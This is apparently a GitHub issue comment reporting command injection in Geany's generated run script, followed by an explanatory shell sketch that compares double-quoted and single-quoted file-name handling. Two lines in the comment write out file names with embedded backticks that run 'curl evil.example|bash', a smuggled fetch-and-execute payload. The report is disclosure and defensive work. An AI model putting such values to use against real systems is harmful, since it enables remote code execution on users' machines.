WrapEarnPass left a comment (geany/geany#4611)

My expanded shellscript from geany-2.1 (via debian/testing) does not contain the same value as the exemplar.

Exemplar

```
./test`curl http://evil.example/payload.sh|bash`
```

Capture the shellscript:

```
watch -n 0.01 -g 'cat /tmp/geany*.sh 2>&1 >> /tmp/watch.sh'
```

Local test:

```
"./test`curl evil.example|bash`"
```

This however, does still attempt the backtick, as evidenced by the shellscript output:

<img width="811" height="229" alt="Image" src="https://github.com/user-attachments/assets/2bbca231-a3a8-4d9b-a245-d3c35677380d" />

Impact confirmed with modified initial condition.
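
The comment above observes that a file name wrapped in double quotes in a generated script still has its backticks evaluated. The following is an added example, not part of the comment and not Geany's code: it assumes a hypothetical generator that writes one script line per file name, and uses a constructed file name whose substitution is a harmless `echo`.

```shell
#!/bin/sh
# Constructed file name; the embedded substitution only echoes a marker.
name='./test`echo INJECTED`'

# Quote a string for POSIX sh: wrap it in single quotes and rewrite
# every embedded ' as '\'' so nothing inside is interpreted.
# (Assumption of this sketch: the name does not end in a newline,
# which command substitution would strip.)
sh_quote() {
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

# Hypothetical generator, weak form: the name is placed between double
# quotes, where the shell still performs `...` and $(...) substitution.
render_double() {
    printf 'printf "%%s" "%s"\n' "$1"
}

# Hypothetical generator, hardened form: the name is single-quoted.
render_single() {
    printf 'printf "%%s" %s\n' "$(sh_quote "$1")"
}

# Execute one generated line in a fresh shell, the way a run script
# would be executed, and return what the command received as its argument.
run_line() {
    sh -c "$1"
}

echo "double-quoted line: $(render_double "$name")"
echo "  argument seen:    $(run_line "$(render_double "$name")")"
echo "single-quoted line: $(render_single "$name")"
echo "  argument seen:    $(run_line "$(render_single "$name")")"
```

With the double-quoted form the command receives `./testINJECTED`, showing the substitution ran; with the single-quoted form it receives the file name byte for byte.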
